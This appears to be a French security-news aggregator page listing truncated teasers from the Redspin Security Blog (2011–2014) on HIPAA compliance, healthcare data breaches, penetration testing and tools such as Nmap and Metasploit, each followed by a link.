http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2014-08-30 01:26:41 - Redspin Security Blog : Redspin will be participating in several great healthcare and security conferences this September Make sure you tune in to get useful information about IT security, policy compliance, and penetration testing Stanford Medicine X Palo Alto, CA Practical Information and Security Risk Management for ePatients by Redspin VP Chris Campbell September 6 9 20am HIMSS Privacy and Security Forum Boston, MA Look for Redspin's co-exhibition with EMC September 8-9 The Summit of the Southeast Read More http://www.secuobs.com/revue/news/532250.shtmlhttp://www.secuobs.com/revue/news/532250.shtml Secuobs.com : 2014-07-26 14:58:29 - Redspin Security Blog - We may be able to send a man to the moon but we still have a long way to go before all of our web applications are sufficiently protected from hackers http://www.secuobs.com/revue/news/527065.shtmlhttp://www.secuobs.com/revue/news/527065.shtml Secuobs.com : 2014-07-25 14:38:08 - Redspin Security Blog - Google's founders, Sergey Brin and Larry Page, were recently asked at a conference if they could imagine Google becoming a healthcare company They both said no and explained their reasoning as follows Brin felt the regulatory obstacles would dissuade a lot of entrepreneurs from entering the market and added it's just a painful business to be in Page gave an example of what he thought could be a useful medical research tool and said that's almost impossible to do because of HIPAA Well, Read More http://www.secuobs.com/revue/news/526945.shtmlhttp://www.secuobs.com/revue/news/526945.shtml Secuobs.com : 2014-07-09 00:32:16 - Redspin Security Blog - The risk of a HIPAA risk analysis is in not selecting the right team for the job http://www.secuobs.com/revue/news/524246.shtmlhttp://www.secuobs.com/revue/news/524246.shtml Secuobs.com : 2014-05-21 03:08:56 - Redspin Security Blog - Personally-Owned Devices and Data Sprawl Mobile devices are designed to store less data than traditional laptops and desktop workstations Cloud-based storage continues to enable a steady migration away from local device storage Due to local storage limits, mobile users are increasingly turning to a wide array of cloud storage options to maintain and access their data This is very helpful when a device is lost or stolen but there are unintended consequences in complexity, security, and risk Read More http://www.secuobs.com/revue/news/514597.shtmlhttp://www.secuobs.com/revue/news/514597.shtml Secuobs.com : 2014-05-11 18:15:33 - Redspin Security Blog - The key to Redspin s rapid rise as the leader in HIPAA compliance for healthcare providers has been our unyielding focus on IT security Last week s news that OCR had reached a 48 million settlement agreement with New York-Presbyterian hospital and Columbia University Medical Center relating to HIPAA compliance violations further affirms our position What started as an investigation of a 6,800 record ePHI breach became a multi-million dollar black-eye for those providers At the source Read More http://www.secuobs.com/revue/news/512954.shtmlhttp://www.secuobs.com/revue/news/512954.shtml Secuobs.com : 2014-04-08 21:06:55 - Redspin Security Blog - A two year old vulnerability in OpenSSL--the default cryptographic library used in many software applications including web servers, operating systems, email, and instant-messaging clients --has been discovered This vulnerability could make it possible for external parties to mine server memory for data including private encryption keys, passwords, and other credentials If you are hosting a web server using a vulnerable version of OpenSSL including most variants of Linux , it is recommended Read More http://www.secuobs.com/revue/news/507099.shtmlhttp://www.secuobs.com/revue/news/507099.shtml Secuobs.com : 2014-03-25 18:53:45 - Redspin Security Blog - The 2009 HITECH Act deputized the Office of Civil Rights OCR to conduct HIPAA security audits under the auspices of the Department of Health and Human Services HHS But as it turns out, OCR is not the only HIPAA enforcer in town State attorneys general can claim a similar right to audit in fact several were initially trained by OCR to do so In the second half of 2013, the Center for Medicare Services CMS began conducting audits of eligible hospitals and providers that had received payments Read More http://www.secuobs.com/revue/news/504753.shtmlhttp://www.secuobs.com/revue/news/504753.shtml Secuobs.com : 2014-03-11 22:58:45 - Redspin Security Blog - A Mobile Device Management MDM solution is a single security tool that must work in concert with many other IT operations to achieve information security Choosing the right MDM requires significant forethought Implementing all the controls correctly for all end-users requires cooperation with system owners Maintaining secure configurations and accurate device information requires ongoing support Choosing, implementing, and maintaining your MDM are each complex tasks with their own inherent Read More http://www.secuobs.com/revue/news/502371.shtmlhttp://www.secuobs.com/revue/news/502371.shtml Secuobs.com : 2014-02-27 23:07:37 - Redspin Security Blog - Covered entities and their business associates must conduct periodic HIPAA risk assessments aka HIPAA risk analysis under the HIPAA Security Rule and Omnibus Final Rule For eligible covered entities, a HIPAA risk assessment is also a core requirement of their Stage 1 and Stage 2 attestations for the EHR Meaningful Use Incentive Program Both HHS Office of Civil Rights OCR and Center for Medicare Services CMS have conducted hundreds of HIPAA audits over the past 18 months OCR, the lead read more http://www.secuobs.com/revue/news/500344.shtmlhttp://www.secuobs.com/revue/news/500344.shtml Secuobs.com : 2014-01-23 20:16:28 - Redspin Security Blog - There are many HIPAA consultants, law firms, software companies, cloud service providers, and others who will happily provide you with a quote for a HIPAA security risk analysis Neither the HIPAA Security Rule nor the respective references in Meaningful Use prescribe the exact form or format of a HIPAA Security Risk Analysis So it is not surprising that so many enterprising professionals will offer their version of how a third-party firm can address this scope of work What is surprising read more http://www.secuobs.com/revue/news/493667.shtmlhttp://www.secuobs.com/revue/news/493667.shtml Secuobs.com : 2014-01-23 19:16:09 - Redspin Security Blog - The Open Web Application Security Project OWASP Top Ten project is an ongoing resource for application developers, IT professionals, and security experts outlining and identifying some of the most critical risks facing organizations today The 2013 release marks the tenth year of the OWASP Top Ten project Here at Redspin, we utilize the OWASP Top Ten in our Application Security assessments and members of our team have founded an OWASP chapter right here in Santa Barbara We have introduced the read more http://www.secuobs.com/revue/news/493641.shtmlhttp://www.secuobs.com/revue/news/493641.shtml Secuobs.com : 2014-01-14 19:20:23 - Redspin Security Blog - Ethical hacking sounds like an oxymoron If you are someone who is responsible for the confidentiality, integrity, and availability of data on your network, isn t getting hacked the last thing you would want Don t worry Ethical hacking projects or assessments don t involve doing any damage to your network Sometimes, though, the best way to understand exactly how a real hacker would attack your assets is to simulate a real-world attack Think of the pain that Target and its customers might read more http://www.secuobs.com/revue/news/491544.shtmlhttp://www.secuobs.com/revue/news/491544.shtml Secuobs.com : 2014-01-08 02:38:13 - Redspin Security Blog - Last week, it was reported that House Majority Leader Eric Cantor Rep VA intends to draft legislation early in 2014 that would strengthen the IT security requirements of the Obama Administration in regard to the HealthCaregov website With more than 2 million Americans now enrolled in health plans through HealthCaregov, Cantor believes that a stricter set of data security requirements should apply to the determination and reporting of any breach of personal information that occurs via the website Currently, read more http://www.secuobs.com/revue/news/490295.shtmlhttp://www.secuobs.com/revue/news/490295.shtml Secuobs.com : 2013-12-12 23:02:25 - Redspin Security Blog - An recent interview with Dan Berger, President and CEO, Redspin Inc Q You mention that there is more focus on the EHR in stage 2 What kinds of things do you think CMS is really looking for A What I think has happened, in comparison to stage 1 where the onus was really basically on a provider using a certified EHR system in order to be even eligible for an incentive program, I think the onus has moved on to read more http://www.secuobs.com/revue/news/486007.shtmlhttp://www.secuobs.com/revue/news/486007.shtml Secuobs.com : 2013-10-31 00:27:41 - Redspin Security Blog - All organizations regulated by HIPAA must now document and report security incidents The path from investigation to notification begins with discovery and initial investigation of the security incident, followed by a determination as to whether there was a security breach and a subsequent privacy breach, followed by breach notification Most simply first the security investigation, next the privacy investigation and lastly breach notification In a perfect world There are many ways that a security or privacy incident can be discovered read more http://www.secuobs.com/revue/news/478104.shtmlhttp://www.secuobs.com/revue/news/478104.shtml Secuobs.com : 2013-06-17 19:03:23 - Redspin Security Blog - The Open Web Application Security Project OWASP Top 10 project is an ongoing resource for application developers, IT professionals, and security experts outlining and identifying some of the most critical risks facing organizations today The 2013 release marks the tenth year of the OWASP Top 10 project Here at Redspin, we utilize the OWASP Top 10 in our Application Security assessments and members of our team have founded an OWASP chapter right here in Santa Barbara We have introduced the read more http://www.secuobs.com/revue/news/451899.shtmlhttp://www.secuobs.com/revue/news/451899.shtml Secuobs.com : 2013-04-05 02:23:09 - Redspin Security Blog - HIMSS, the healthcare industry s standard bearer for the promotion of information technology IT , held its 13th annual conference in New Orleans last month Nearly 35,000 people attended the event including former president Bill Clinton, fellow politicos James Carville and Karl Rove, and bow-tied Dr Farzad Mostashari, HHS s National Coordinator for Health Information Technology Interoperability and exchange were the hot topics of the week, further jazzed by the recently announced CommonWell Health Alliance a 6-party partnership between Cerner, McKesson, Allscripts, http://www.secuobs.com/revue/news/437768.shtmlhttp://www.secuobs.com/revue/news/437768.shtml Secuobs.com : 2013-03-06 01:12:34 - Redspin Security Blog - The much anticipated executive order titled Improving Critical Infrastructure Cybersecurity was recently unveiled by the White House As much praise as the President s order garnered, there are still many unknowns about how the order impacts not just healthcare but all major industries in the United States In the era of HIPAA, HITECH, SOX and another dozen regulatory security compliance acronyms how should the order be regarded Potential, nothing more To understand what the executive order means and doesn t mean we http://www.secuobs.com/revue/news/431643.shtmlhttp://www.secuobs.com/revue/news/431643.shtml Secuobs.com : 2013-02-04 18:14:08 - Redspin Security Blog - On January 17, 2013, the long-awaited HHS HIPAA Omnibus Rule was posted on the Federal Register and has been the subject of much fanfare in the press According to HHS Secretary Kathleen Sebelius the new rule will help protect patient privacy and safeguard patient s health information in an ever-expanding digital age Leon Rodriguez, Director of HHS Office of Civil Rights OCR , described the Omnibus rule-making as the most sweeping changes to the HIPAA Privacy and Security Rules since they were http://www.secuobs.com/revue/news/425669.shtmlhttp://www.secuobs.com/revue/news/425669.shtml Secuobs.com : 2013-01-11 20:44:02 - Redspin Security Blog - Over the past year, Redspin along with many others , has reported that breaches of protected health information PHI are at epidemic levels We ve all based this assertion on quantitative statistics The Breach Notification Rule requires that healthcare providers report large PHI breaches defined as those affecting 500 records to HHS which then publishes those details on its website, the so-called Wall of Shame Numerous presentations, news articles, blog posts, and tweets have reported on the most egregious offenses and the http://www.secuobs.com/revue/news/421296.shtmlhttp://www.secuobs.com/revue/news/421296.shtml Secuobs.com : 2012-11-28 19:14:40 - Redspin Security Blog - I recently presented the case for covered entities to be more proactive in regard to their business associate s IT security posture The audience included over 50 healthcare CISOs Most of them agreed that the risk of PHI breach among their business associates was an unknown, or very hard to measure or even likely to be very high After my talk, one CISO said to me My organization has dozens of business associates What is the ROI of conducting a risk http://www.secuobs.com/revue/news/413916.shtmlhttp://www.secuobs.com/revue/news/413916.shtml Secuobs.com : 2012-09-20 17:33:14 - Redspin Security Blog - Asset management is broadly defined as any system that monitors and maintains things of value to an entity or group In regard to safeguarding the security of electronic health records, we often think of it as a custodial responsibility Healthcare providers safeguard PHI primarily so that the patient confidentiality is not breached But in fact, that information is also an asset, something of great value to the provider Three news items regarding recent healthcare data breaches make this abundantly clear http://www.secuobs.com/revue/news/400828.shtmlhttp://www.secuobs.com/revue/news/400828.shtml Secuobs.com : 2012-08-06 22:33:18 - Redspin Security Blog - Many healthcare organizations breathed a collective sigh of relief when the Office of Civil Rights OCR under the Department of Health and Human Services HHS finally made their HIPAA audit protocol publicly available this past June It can be accessed here As a refresher, Section 13411 of the 2009 HITECH Act required that HHS provide for periodic audits to ensure that covered entities and business associates that are subject to the requirements of HITECH and HIPAA , comply with such requirements The http://www.secuobs.com/revue/news/392012.shtmlhttp://www.secuobs.com/revue/news/392012.shtml Secuobs.com : 2012-07-03 01:49:12 - Redspin Security Blog - The Department of Health and Human Services Offices for Civil Rights OCR have finally published the official protocol and detailed procedures guiding their HIPAA Audit program The protocol, developed by subcontractor KMPG together with OCR, includes 77 evaluation areas for security and another 88 areas for privacy breach notification Here s a link to the publication which is conveniently keyword searchable http ocrnotificationshhsgov hipaahtml Of particular interest to Redspin is the section dedicated to IT security As former White House Cybersecurity Czar Howard Schmidt said recently, Without http://www.secuobs.com/revue/news/385061.shtmlhttp://www.secuobs.com/revue/news/385061.shtml Secuobs.com : 2012-06-27 23:01:01 - Redspin Security Blog - The Health and Human Services HHS Office of Civil Rights OCR has increased enforcement actions over the past several months, including reaching several breach resolution agreements with covered entities OCR has also informed an additional 90 organizations of its intent to conduct HIPAA security audits before the end of the year None of this is particularly surprising For almost a year now, OCR has signaled that they intend to take their HIPAA enforcement responsibilities seriously and there certainly have been http://www.secuobs.com/revue/news/384234.shtmlhttp://www.secuobs.com/revue/news/384234.shtml Secuobs.com : 2012-06-06 01:26:43 - Redspin Security Blog - Cyber insurance provides an opportunity to address residual risk in your information security program to offset the costs due to a data breach of ePHI However, individuals polices, coverage and exclusions are highly variable, so just like any security control it s important to understand your security risk profile before an appropriate security insurance policy can be defined An assessment, such as a HIPAA Security Risk Analysis should be the first step in any insurance policy strategy Here s why You ll have http://www.secuobs.com/revue/news/379713.shtmlhttp://www.secuobs.com/revue/news/379713.shtml Secuobs.com : 2012-05-08 00:49:52 - Redspin Security Blog - Redspin has provided security risk analysis SRA services to dozens of hospitals, helping them meet Core Measure 14 of the Stage 1 Meaningful Use EHR Incentive Program As one of the leading experts in IT security, we take a comprehensive approach to these engagements As such, our primary focus is to help our clients truly safeguard PHI from data breach by expanding beyond a strict interpretation of the Stage 1 Rule It is from that vantage point that we are http://www.secuobs.com/revue/news/374191.shtmlhttp://www.secuobs.com/revue/news/374191.shtml Secuobs.com : 2012-05-02 18:53:10 - Redspin Security Blog - At first read, the security risk analysis SRA provisions of the proposed Stage 2 meaningful use regulations appear to have changed only slightly from those in Stage 1 The language in the draft rule is nearly identical to Stage 1, with one notable addition highlighted below Conduct or review a security risk analysis in accordance with the requirements under 45 CFR 164308 a 1 , including addressing the encryption security of data at rest in accordance with requirements under 45 CFR 164312 a 2 iv and 45 CFR 164306 d 3 , http://www.secuobs.com/revue/news/373186.shtmlhttp://www.secuobs.com/revue/news/373186.shtml Secuobs.com : 2012-03-18 03:35:13 - Redspin Security Blog - The cost of a significant data breach of protected health information PHI has been a popular topic in the news recently The new ANSI publication The Financ ial Impact of Breached Protected Health Information A Business Case for Enhanced PHI Security debuted with much fanfare in DC earlier this month White House Cybersecurity Czar Howard Schultz kicked off a March 5th press conference where the release of the report was announced His participation helped elevate the issue to a national audience http://www.secuobs.com/revue/news/364323.shtmlhttp://www.secuobs.com/revue/news/364323.shtml Secuobs.com : 2012-03-08 22:15:04 - Redspin Security Blog - On Monday, March 5th, I was invited to a press conference in Washington, DC announcing the release of The Financial Impact of Breached Protected Health Information A Business Case for Enhanced PHI Security, published by the American National Standards Institute ANSI The honorable Howard A Schmidt, White House Cybersecurity Czar, kicked off the event Mr Schmidt commented that in the continuum of the cybersecurity issues we look at, healthcare security is obviously critical as this is one that affects http://www.secuobs.com/revue/news/362345.shtmlhttp://www.secuobs.com/revue/news/362345.shtml Secuobs.com : 2012-02-26 05:00:01 - Redspin Security Blog - Last week, Health and Human Services Secretary Kathleen Sebelius reported that the number of hospitals using electronic health records EHR has more than doubled in the last two years from 16 to 35 percent She also said that 85 percent of all hospitals now report that by 2015 they intend to participate in The Centers for Medicare and Medicaid Services CMS EHR incentive program Also last week, CMS released the proposed Stage 2 Meaningful Use requirements for public comment The http://www.secuobs.com/revue/news/359943.shtmlhttp://www.secuobs.com/revue/news/359943.shtml Secuobs.com : 2012-02-24 15:04:15 - Redspin Security Blog - I wasn t the most popular person around the office printer late yesterday afternoon It was right after HHS and CMS finally released the proposed rule for Stage 2 of the EHR Meaningful Use Incentive Program Earlier in the week, rumors regarding the release of the 445-page document swirled around the HIMSS12 Conference Perhaps because it was in Las Vegas, Stage 2 seemed to take on its own celebrity status HIMSS participants arrived early for the 8 30AM Achieving Meaningful Use Symposium http://www.secuobs.com/revue/news/359721.shtmlhttp://www.secuobs.com/revue/news/359721.shtml Secuobs.com : 2012-01-25 21:03:41 - Redspin Security Blog - Get er Done I m referring of course to the HIPAA Security Risk Analysis requirement of the Stage 1 EHR Meaningful Use Incentive Plan Between 85pourcents-90pourcents of the 5,000 eligible hospitals say they plan to qualify for Stage 1, yet data from the Centers for Medicare Medicaid Servicesshows less than 25pourcents have attested and received payment as of November 30, 2011 So for the 3,300 or so other hospitals this is no time to procrastinate Time flies, whether you re having fun or http://www.secuobs.com/revue/news/354115.shtmlhttp://www.secuobs.com/revue/news/354115.shtml Secuobs.com : 2011-12-22 19:08:23 - Redspin Security Blog - Every IT department faces the challenge of having to apply limited resources headcount, technology, 3rd party assessments against a plethora of potential security risks Choosing wisely is often the difference between an effective security strategy and an ineffective one With that in mind and a number of possible assessment approaches available, what benefits can be gained from an internal penetration test First, since security terminology is often misunderstood, let s first define internal penetration testing An internal pen test is a http://www.secuobs.com/revue/news/348648.shtmlhttp://www.secuobs.com/revue/news/348648.shtml Secuobs.com : 2011-11-23 03:18:57 - Redspin Security Blog - Earlier this month, the US Department of Health and Human Services HHS Office for Civil Rights OCR released further details on its plan to audit 150 covered entities under its pilot HIPAA audit program Periodic audits of the HIPAA privacy, security and breach notification standards are required of the HHS Secretary under Section 13411 of the 2009 HITECH Act 2009 In June of 2011, OCR awarded a 92 million contract to the consulting firm KPMG to develop an audit methodology http://www.secuobs.com/revue/news/342138.shtmlhttp://www.secuobs.com/revue/news/342138.shtml Secuobs.com : 2011-11-15 17:17:05 - Redspin Security Blog - In any complex, cross-functional business challenge, responsibility and authority must be distributed intelligently while at the same time prove a process of internal dispute resolutions An information security program is one such complex and multifarious business necessity At its heart, information security is a method of managing risk to information and information systems, and reducing uncertainty relative to organizational objectives it is a balance But the success of an information security program depends upon the ability of an organization to http://www.secuobs.com/revue/news/340776.shtmlhttp://www.secuobs.com/revue/news/340776.shtml Secuobs.com : 2011-11-05 02:36:32 - Redspin Security Blog - Gordon Lyon, better known by his online alias of Fyodor and as the creator of the very popular and awesome tool Nmap has released the results of the Nmap 2010 User Survey which he performs every couple of years The survey is filled out by members of the Nmap-Hackers mailing list, one of several mailing lists that Fyodor maintains which is made up of many smart minds in the security world The 2010 survey had more than 3000 participants throw http://www.secuobs.com/revue/news/338988.shtmlhttp://www.secuobs.com/revue/news/338988.shtml Secuobs.com : 2011-10-06 20:11:25 - Redspin Security Blog - At Redspin we are often asked to perform wireless security assessments for organizations that have recently deployed or upgraded their wireless infrastructure with top-of-the-line access points APs , controllers and wireless intrusion detection systems WIDS Many deployments are to support inter-office mobility a need that has gone from a rising tide to a tsunami in http://www.secuobs.com/revue/news/333153.shtmlhttp://www.secuobs.com/revue/news/333153.shtml Secuobs.com : 2011-10-04 02:38:43 - Redspin Security Blog - As required by section 13402 e 4 of the HITECH Act, the HHS Secretary must post a list of breaches of protected health information PHI impacting 500 or more individuals In the past 2 years, over 118 million Americans have been affected in nearly 330 separate incidents This information is contained in a publicly searchable and downloadable http://www.secuobs.com/revue/news/332437.shtmlhttp://www.secuobs.com/revue/news/332437.shtml Secuobs.com : 2011-09-25 14:33:15 - Redspin Security Blog - I wasn t the only one celebrating a birthday last week It s been exactly two years since the breach notification rule, mandated by the HITECH Act, took effect Since then, 330 major health information breaches affecting 118 million individuals have been reported to the Department of Health and Human Services Office for Civil Rights OCR And http://www.secuobs.com/revue/news/330939.shtmlhttp://www.secuobs.com/revue/news/330939.shtml Secuobs.com : 2011-09-14 20:24:21 - Redspin Security Blog - Importing Nmap scans directly into Metasploit is one of the best time-saving tricks you can accomplish while using the Metasploit Framework Once the full Nmap data is happily in your PostgreSQL database and accessible to Metasploit you can do all kinds of cool things with it that will save you lots of time and frustration http://www.secuobs.com/revue/news/328880.shtmlhttp://www.secuobs.com/revue/news/328880.shtml Secuobs.com : 2011-09-02 19:18:30 - Redspin Security Blog - Want a quick way to see what GPO s are applied to your local system, just using built in utilities Using the GUI to manually view what settings are applied is awkward and slow Use the following commands to see what policies are being handed down to the system you re on and what they re enforcing This http://www.secuobs.com/revue/news/326757.shtmlhttp://www.secuobs.com/revue/news/326757.shtml Secuobs.com : 2011-08-28 23:57:45 - Redspin Security Blog - I haven t seen a Windows worm in the wild in a long time The last time a major worm infestation took place was in 2003 in the days of Blaster which spread via an unpatched flaw in RPC That same year was Slammer, and Code Red a few years before in 2001 This new worm http://www.secuobs.com/revue/news/325670.shtmlhttp://www.secuobs.com/revue/news/325670.shtml Secuobs.com : 2011-08-19 17:40:42 - Redspin Security Blog - Install the latest version of the Metasploit 4 Framework MSF4 on Ubuntu 1104 Natty Narwhal using the following commands This downloads and installs the generic Linux binary which comes bundled with all the necessary components you need for Metasploit to install and run This should work for most users and is the easiest way to http://www.secuobs.com/revue/news/324090.shtmlhttp://www.secuobs.com/revue/news/324090.shtml Secuobs.com : 2011-08-18 00:50:12 - Redspin Security Blog - An attacker will take the path of least resistance in order to gain access to critical systems and data During a penetration test we ll take the same tactic as well Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to http://www.secuobs.com/revue/news/323755.shtmlhttp://www.secuobs.com/revue/news/323755.shtml Secuobs.com : 2011-08-04 08:30:25 - Redspin Security Blog - In July, the HHS Office of Civil Rights OCR announced that they had appointed consulting firm KPMG to conduct up to 150 HIPAA audits of covered entities and business associates by the end of 2012 The implementation of the audit program fulfills a compliance enforcement mandate of the 2009 HITECH Act The KPMG contract enables http://www.secuobs.com/revue/news/320987.shtmlhttp://www.secuobs.com/revue/news/320987.shtml Secuobs.com : 2011-07-29 18:50:46 - Redspin Security Blog - Earlier this week HD Moore gave a live webcast demoing the new highly anticipated Metasploit 4 release The live demo went as smoothly as a live demo can go, and as always HD Moore is great to hear talk no matter what the topic is This presentation was particularly excellent because he s so passionate about http://www.secuobs.com/revue/news/320000.shtmlhttp://www.secuobs.com/revue/news/320000.shtml Secuobs.com : 2011-07-21 09:48:57 - Redspin Security Blog - Today Apple released OSX 107 Lion the latest version of their desktop and server OS A number of new security features have been introduced with Lion which are very welcome, as well as a bunch of new usability tweaks and other generally cool things I upgraded my i7 Macbook Pro to it a few hours ago http://www.secuobs.com/revue/news/318388.shtmlhttp://www.secuobs.com/revue/news/318388.shtml Secuobs.com : 2011-07-10 16:12:19 - Redspin Security Blog - The FFIEC Federal Financial Institutions Examination Council , the banking interagency body that creates unified standards across the various regulatory agencies, recently issued new guidance on managing risks in user authentication for online transactions The guidance is practical and has relevance for any industry in which sensitive transactions are conducted online Categorically this applies to banks http://www.secuobs.com/revue/news/316133.shtmlhttp://www.secuobs.com/revue/news/316133.shtml Secuobs.com : 2011-07-04 20:28:11 - Redspin Security Blog - We hold these truths to be self-evident, that all networks are created for a higher purpose, that they are intended to support communication, productivity, and prosperity, and are endowed by their architects and administrators with certain unalienable Rights, that among these are Security, Confidentiality, and Integrity That to secure these systems, expertise arises among certain http://www.secuobs.com/revue/news/315098.shtmlhttp://www.secuobs.com/revue/news/315098.shtml Secuobs.com : 2011-07-01 22:53:39 - Redspin Security Blog - Certain types of computer dysfunction are analogous to disease, at least in a descriptive sense For example, we say that a PC can get infected by a computer virus The recent rash of hacker attacks makes me wonder if we re on the verge of a data breach epidemic True epidemics occur when new human cases http://www.secuobs.com/revue/news/314835.shtmlhttp://www.secuobs.com/revue/news/314835.shtml Secuobs.com : 2011-06-28 19:48:32 - Redspin Security Blog - In a new and revised format, SANS along with MITRE have published the latest list of the highest risk software security vulnerabilities the revision to the list is based on the CWE, CWSS and CWRAF security standards The announcement leverages and highlights these new standards and collaboration efforts among the security community including corporate, non-profit http://www.secuobs.com/revue/news/314061.shtmlhttp://www.secuobs.com/revue/news/314061.shtml Secuobs.com : 2011-06-27 18:32:13 - Redspin Security Blog - Over the weekend the Lulz Security guys called it quits Their last release came on the 50th day since they started their escapades It isn t clear if they had intended from the start to only exist for 50 days, but after DDOS ing ciagov they had escalated their wanted status to critical and it was likely http://www.secuobs.com/revue/news/313811.shtmlhttp://www.secuobs.com/revue/news/313811.shtml Secuobs.com : 2011-06-13 08:46:52 - Redspin Security Blog - The New York Times reported this weekend on a potentially serious breach at the International Monetary Fund IMF The Times reports that the breach occurred perhaps several months ago, yet the fund only disclosed this to internal staff and board members on Wednesday Other than the report from the Times, there is not a lot of available http://www.secuobs.com/revue/news/310758.shtmlhttp://www.secuobs.com/revue/news/310758.shtml Secuobs.com : 2011-06-11 01:19:26 - Redspin Security Blog - To qualify for Meaningful Use an organization must use an approved EHR application The standards that EHR technology must meet to be approved for Meaningful Use are defined in 45 CFR 170302 We are often asked if our HIPAA Risk Analysis covers Certification of their EHR Technology to 45 CFR 170302 General certification criteria for http://www.secuobs.com/revue/news/310562.shtmlhttp://www.secuobs.com/revue/news/310562.shtml Secuobs.com : 2011-06-09 18:54:11 - Redspin Security Blog - The RSA Breach, their initial reaction, and their follow-up communication regarding the Lockheed Martin attack which they are admitting is related to the initial RSA breach makes us question their priorities Revenue and brand come first Customer security is second Of course both of these are inter-related you surely can t build a robust security brand http://www.secuobs.com/revue/news/310208.shtmlhttp://www.secuobs.com/revue/news/310208.shtml Secuobs.com : 2011-06-09 07:14:58 - Redspin Security Blog - A recent report suggests that nearly 40pourcents of data breaches of protected health information occur at third party companies entrusted by health care providers with sensitive data A striking statistic particularly since HIPAA and HITECH mandate that healthcare providers ensure privacy and security among such business associates While providers generally insist these obligations be included http://www.secuobs.com/revue/news/310093.shtmlhttp://www.secuobs.com/revue/news/310093.shtml Secuobs.com : 2011-05-31 01:29:09 - Redspin Security Blog - The OIG the Office of Inspector General the audit arm of the Department of Health Human Services recently released their report on the CMS s Centers for Medicare Medicaid Services oversight and enforcement regarding hospitals HIPAA Security Rule implementation In the scathing report the OIG clearly characterizes the current regulatory compliance efforts by the http://www.secuobs.com/revue/news/308035.shtmlhttp://www.secuobs.com/revue/news/308035.shtml Secuobs.com : 2011-05-23 20:01:49 - Redspin Security Blog - Account takeover fraud remains a major problem for financial institutions and small businesses that are impacted The FBI recently warned about increased Wire Transfer Fraud to Chinese Companies Typically the hackers compromise the workstation of an employee who has the ability to initiate wire-transfers Once the user logs on to their online banking the hackers steal the credentials http://www.secuobs.com/revue/news/306624.shtmlhttp://www.secuobs.com/revue/news/306624.shtml Secuobs.com : 2011-05-23 19:09:09 - Redspin Security Blog - Security vs Compliiance As an independent provider of security assessments, we are keenly aware of the 2 primary drivers of an objective security assessment security or compliance Roughly, these two views of risk management can be thought of as follows Security For organizations in this camp, ensuring that ePHI is protected is mission critical http://www.secuobs.com/revue/news/306600.shtmlhttp://www.secuobs.com/revue/news/306600.shtml Secuobs.com : 2011-05-19 06:16:55 - Redspin Security Blog - We wouldn t be so bold as to say I told you so, but for months Redspin has been publicly calling on the ONC to beef up the security controls and measures in the meaningful use EHR incentive plan, the Federal Strategic Health IT Plan, and the HIPAA Security Rule itself In fact just two weeks http://www.secuobs.com/revue/news/305766.shtmlhttp://www.secuobs.com/revue/news/305766.shtml Secuobs.com : 2011-05-16 01:38:40 - Redspin Security Blog - Last Monday night, I boarded a red-eye flight from LAX to Dulles to attend the OCR NIST HIPAA Security Conference I landed at 6 15AM, did a quick change into my business attire, grabbed some coffee, rented a car, and found my way to the Ronald Reagan Building at 1600 Pennsylvania Avenue, 3 blocks from The White http://www.secuobs.com/revue/news/304941.shtmlhttp://www.secuobs.com/revue/news/304941.shtml Secuobs.com : 2011-05-07 02:09:32 - Redspin Security Blog - One of the ONC s key responsibilities is to provide strategic leadership to the public and private sector Mandated under the HITECH Act of 2009, the ONC must publish and update its strategic plan for improving healthcare through the use of information technology The Federal Health IT Strategic Plan, 2011-2015, first released in draft form in http://www.secuobs.com/revue/news/303199.shtmlhttp://www.secuobs.com/revue/news/303199.shtml Secuobs.com : 2011-05-06 19:53:01 - Redspin Security Blog - There is lots of buzz based on the congressional testimony on how lax the security was on the Sony PlayStation Network Since there were no sources cited in the testimony we wondered if there is publicly available info to corroborate that view point A bit of digging in some of the public forums turned up some interesting information http://www.secuobs.com/revue/news/303151.shtmlhttp://www.secuobs.com/revue/news/303151.shtml Secuobs.com : 2011-05-05 22:42:23 - Redspin Security Blog - If you are an eligible hospital or eligible professional then meaningful use incentives and qualifying for them is likely top on your mind If you are a vendor of EHR technology you have been working to get your software certified for meaningful use so your customers can qualify for the incentives Many organizations are in the midst http://www.secuobs.com/revue/news/302942.shtmlhttp://www.secuobs.com/revue/news/302942.shtml Secuobs.com : 2011-05-02 21:58:42 - Redspin Security Blog - We regularly are asked to explain the PCI merchant levels to customers The merchant levels are a pretty straightforward grouping of merchants by credit card transaction volume Each of the Cardbrands Visa, Mastercard, American Express, Discover and JCB list the transaction volumes for the different merchant levels on their websites While all companies that store, http://www.secuobs.com/revue/news/302097.shtmlhttp://www.secuobs.com/revue/news/302097.shtml Secuobs.com : 2011-05-01 18:55:07 - Redspin Security Blog - In a press conference late last week, Sony PlayStation Network executives confirmed that the recent hacking incident that exposed personally identifiable information and credit card numbers of all or part of the user database, was an exploit of a known vulnerability just not one known to Sony The external intrusion has left 77 million http://www.secuobs.com/revue/news/301873.shtmlhttp://www.secuobs.com/revue/news/301873.shtml Secuobs.com : 2011-04-27 08:24:48 - Redspin Security Blog - Sony s PlayStation Network PSN online gaming network has been compromised in what Sony is calling an illegal and unauthorized intrusion Some 77 million users subscribe to this service and it sounds like they ve all had their information stolen Information about PSN subscribers that Sony has confirmed to have been compromised includes Name Address Country Email http://www.secuobs.com/revue/news/301039.shtmlhttp://www.secuobs.com/revue/news/301039.shtml Secuobs.com : 2011-04-26 17:24:07 - Redspin Security Blog - Lets review different viewpoints driving why healthcare organizations implement a HIPAA Security Risk Analysis The purpose of exploring these different perspectives is to show that the primary objectives for doing a HIPAA Security Risk Analysis can be categorically defined as either security or compliance and that both of these objectives can be achieved if http://www.secuobs.com/revue/news/300851.shtmlhttp://www.secuobs.com/revue/news/300851.shtml Secuobs.com : 2011-04-19 19:51:01 - Redspin Security Blog - We are often asked How do we prepare for a HIPAA Security Risk Analysis The short answer is It s easy It s actually better to be under-prepared than to delay the process in the hopes of having your IT environment stabilized and your documentation completed both are dynamic, always in flux and will never be http://www.secuobs.com/revue/news/299466.shtmlhttp://www.secuobs.com/revue/news/299466.shtml Secuobs.com : 2011-04-15 02:08:11 - Redspin Security Blog - As security guys and Linux GNU fanboys , we tend to do absolutely everything possible via the commandline This is pretty easy in Linux Unix OS s, but unfortunately we deal with a lot of Windows boxes in our line of work, where it is less than easy at times One common scenario we need to undertake is exporting http://www.secuobs.com/revue/news/298584.shtmlhttp://www.secuobs.com/revue/news/298584.shtml Secuobs.com : 2011-04-09 16:03:43 - Redspin Security Blog - In another classic case of the business associate is at fault, but the covered entity takes the wrap the latest breach disclosed by 